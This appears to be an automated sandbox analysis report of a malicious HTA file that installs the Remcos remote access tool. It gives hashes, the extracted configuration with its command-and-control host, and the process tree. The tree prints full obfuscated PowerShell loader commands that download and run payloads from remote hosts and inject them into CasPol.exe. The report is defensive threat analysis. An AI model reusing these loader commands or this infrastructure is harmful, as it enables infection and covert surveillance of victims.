Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-11-2024 08:16

General

  • Target

    sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta

  • Size

    599KB

  • MD5

    5a9dc05899d1a19be638824e5f47b88e

  • SHA1

    418e5c2cfc4ba40069bbcbc7373e9ff0b71740f2

  • SHA256

    741297ecc59d39296f360b100032cdb120af2eb4ccc5b91f370c0eacb9ee7e25

  • SHA512

    0772c9718b79ccff96ed8631ad22d117876c1cb5f1b9313494051e52a63b8f360d8f5fc81beaee296e120a873e99414818bb36db6bf795dfe99d54b3f47f4d7e

  • SSDEEP

    192:4dE6COljVneLyZXcFeLyZXcEeLyZXc/Czt4kQ:b6COljV+zO7

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c

exe.dropper

https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c

Extracted

Family

remcos

Botnet

RemoteHost

C2

nextnewupdationsforu.duckdns.org:14645

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-EC111K

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1564
    • C:\Windows\SysWOW64\WInDowSpoWeRShell\V1.0\POwersheLL.exE
      "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4248
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3820
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zaarxcoa\zaarxcoa.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:232
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA35.tmp" "c:\Users\Admin\AppData\Local\Temp\zaarxcoa\CSCE72E31917781472FBA308DC59AF7AB.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4608
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:964
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3364
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2436
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              6⤵
                PID:3412
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                6⤵
                  PID:4812
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  6⤵
                    PID:2260
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:1388

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POwersheLL.exE.log

          Filesize

          2KB

          MD5

          3d086a433708053f9bf9523e1d87a4e8

          SHA1

          b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

          SHA256

          6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

          SHA512

          931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          12KB

          MD5

          9f09699d3e52cd0447851ea5488ce0a5

          SHA1

          b40c6ddcd5eb00d9d567cb3cc68afb43f8c4fa72

          SHA256

          10ec638e455219ef6e20ec8243560e0cd14a0ecb60d63c4c48cbed57e0c8b6c1

          SHA512

          ba17fb9a4c08613514cf6255ed954a4d2b01a912b86ee87d411618819b28a0f0663b746c4acd97bec2aff7b460b722f247a004f677f0a8d536bb4cc0ba3afa4a

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          8c688edf8135820bd72059964a3baaa5

          SHA1

          60469fdcb87dbd894e131f8df7f89036d3a9efc2

          SHA256

          3a4984458ef310a5c29e59a9a9e28c28a0652ea388bfa1b705e675cf644b3227

          SHA512

          b9dcf0be09b5631dae791b43fac530cc93adf690317e093c75190e5e545dc60d0b04394032fd1b80f0c0af2d9cd84626cff49ed96d57d0e8f2c503eebbaf34db

        • C:\Users\Admin\AppData\Local\Temp\RESCA35.tmp

          Filesize

          1KB

          MD5

          93009251a7ddeda68412359559106f30

          SHA1

          519439d8a540dd2afe2e79f95462ae341d8894f2

          SHA256

          f3151a1f07020ab712a69ffe04e326ba84b383f9b26f54780fb7bfef95dfc552

          SHA512

          7179d253996b9897ccbf9df08d50934e1a928756948043eba53c1b3d4ee391e530835ce2001ef7043be5c6895f74c5352770faa3011a815235f5f98e928502ef

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xi5dp4ws.beu.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\zaarxcoa\zaarxcoa.dll

          Filesize

          3KB

          MD5

          59148d3823258fb6a77cdc683a5d28c6

          SHA1

          a89378a55f392dc96a662354c1233259c8473e01

          SHA256

          cd440d745da8737ed3efe15ec5f11451f669fad1c79cc78f285a1ed6e5e8c620

          SHA512

          0fa38729b98f854609f7a662844e89dd7ca1aeab88b9fc1926cbdece57fbcaadaf976f3c2f1c37fab8bbe84fdd681c7b3ab71d280a065f2ccf8d641f5aca2528

        • C:\Users\Admin\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs

          Filesize

          162KB

          MD5

          8ba4e1dcc487bd110b4bcd41e7ee2ba5

          SHA1

          1881afff1eb946fdb3ee62133ca43d0bc136ac37

          SHA256

          4bcb2f9b3a929bd940484218ef0a8c03842480a15bd8a3c4521f5097bd89d581

          SHA512

          006b7dcfdb7ee27ca1e6aa536c2399321966ffc3b82bc0f86470614345b6e0a2a1ed1d7a143c500669fba375f9706cff8ed421502df7f12f49c3260dc5a8bde4

        • \??\c:\Users\Admin\AppData\Local\Temp\zaarxcoa\CSCE72E31917781472FBA308DC59AF7AB.TMP

          Filesize

          652B

          MD5

          b2abe629df8b4ff33c82a2a75fe8358e

          SHA1

          48337dc03aa817c42eb27ed7a0090af34bdb681d

          SHA256

          4a62bef0d425998b3adb0cd11f23f70fb3c74fdbdc3018578c6dadc3e9d3060d

          SHA512

          9f7822d4abbf4d56ee853ef269ae7ed8db9a5668a320e1e66b2c94eca2a03286eaa847de10aa67e2dfb6a1dc62a6682f12590d2aa103716955db0684eb804e3c

        • \??\c:\Users\Admin\AppData\Local\Temp\zaarxcoa\zaarxcoa.0.cs

          Filesize

          488B

          MD5

          df59540f8edd52a40245b77825076b5c

          SHA1

          101a773a82eef36b277291d6e450d4984136b176

          SHA256

          041ed2f3f184dd53c0b2bacbe7e55a05a747a3ed1aa2cab0e8c93e9ab25a121f

          SHA512

          790e1139eab1d895386730743ea05b591820178b76fec615acab192ad8d2c5960703cebc2c6f4efc8158020506f35cb69ae6545c649e3d87b74845fbc2ec1990

        • \??\c:\Users\Admin\AppData\Local\Temp\zaarxcoa\zaarxcoa.cmdline

          Filesize

          369B

          MD5

          33ff17f8e7372f1241cac947e632f8af

          SHA1

          743d01c8ba5ce4ba7ff42a5c032e2e5a3faa4cb3

          SHA256

          9196f954cac6ebe34c80f3b2eb8453fb1911f30f8a81e02106b82fa0f0ac0e92

          SHA512

          696bb210ad7dbf64d624117ef7538befc4a850a3ace3d63d31cbfc395ad582ab5bbdf247b1fc04105d291ee3d52d85ef74c8bc4c6ed7f8a867381a58014e66c9

        • memory/1388-116-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-105-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-170-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-169-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-168-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-167-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-166-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-165-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-164-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-163-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-162-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-123-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-161-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-160-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-159-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-158-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-157-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-156-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-155-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-154-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-153-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-124-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-152-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-151-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-150-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-149-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-148-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-147-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-146-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-140-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-139-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-138-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-104-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-141-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-106-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-108-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-145-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-111-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-112-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-122-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-114-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-115-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-144-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-117-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-118-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-119-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-120-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-121-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-113-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-143-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-142-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-125-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-126-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-127-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-128-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-129-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-130-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-131-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-132-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-133-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-134-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-135-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-136-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/1388-137-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/2436-103-0x0000000007300000-0x000000000739C000-memory.dmp

          Filesize

          624KB

        • memory/2436-102-0x00000000071A0000-0x00000000072F8000-memory.dmp

          Filesize

          1.3MB

        • memory/3364-87-0x0000000005830000-0x0000000005B84000-memory.dmp

          Filesize

          3.3MB

        • memory/3820-47-0x0000000007270000-0x000000000727E000-memory.dmp

          Filesize

          56KB

        • memory/3820-50-0x0000000007360000-0x0000000007368000-memory.dmp

          Filesize

          32KB

        • memory/3820-29-0x0000000006EE0000-0x0000000006F12000-memory.dmp

          Filesize

          200KB

        • memory/3820-30-0x000000006D600000-0x000000006D64C000-memory.dmp

          Filesize

          304KB

        • memory/3820-40-0x00000000062F0000-0x000000000630E000-memory.dmp

          Filesize

          120KB

        • memory/3820-41-0x0000000006F20000-0x0000000006FC3000-memory.dmp

          Filesize

          652KB

        • memory/3820-42-0x0000000007690000-0x0000000007D0A000-memory.dmp

          Filesize

          6.5MB

        • memory/3820-43-0x0000000007040000-0x000000000705A000-memory.dmp

          Filesize

          104KB

        • memory/3820-44-0x00000000070B0000-0x00000000070BA000-memory.dmp

          Filesize

          40KB

        • memory/3820-45-0x00000000072C0000-0x0000000007356000-memory.dmp

          Filesize

          600KB

        • memory/3820-46-0x0000000007240000-0x0000000007251000-memory.dmp

          Filesize

          68KB

        • memory/3820-48-0x0000000007280000-0x0000000007294000-memory.dmp

          Filesize

          80KB

        • memory/3820-49-0x0000000007380000-0x000000000739A000-memory.dmp

          Filesize

          104KB

        • memory/4248-4-0x0000000070D40000-0x00000000714F0000-memory.dmp

          Filesize

          7.7MB

        • memory/4248-74-0x00000000084B0000-0x0000000008A54000-memory.dmp

          Filesize

          5.6MB

        • memory/4248-6-0x0000000005980000-0x00000000059E6000-memory.dmp

          Filesize

          408KB

        • memory/4248-8-0x0000000005A60000-0x0000000005DB4000-memory.dmp

          Filesize

          3.3MB

        • memory/4248-18-0x0000000006020000-0x000000000603E000-memory.dmp

          Filesize

          120KB

        • memory/4248-5-0x00000000058E0000-0x0000000005902000-memory.dmp

          Filesize

          136KB

        • memory/4248-65-0x00000000065C0000-0x00000000065C8000-memory.dmp

          Filesize

          32KB

        • memory/4248-72-0x0000000070D40000-0x00000000714F0000-memory.dmp

          Filesize

          7.7MB

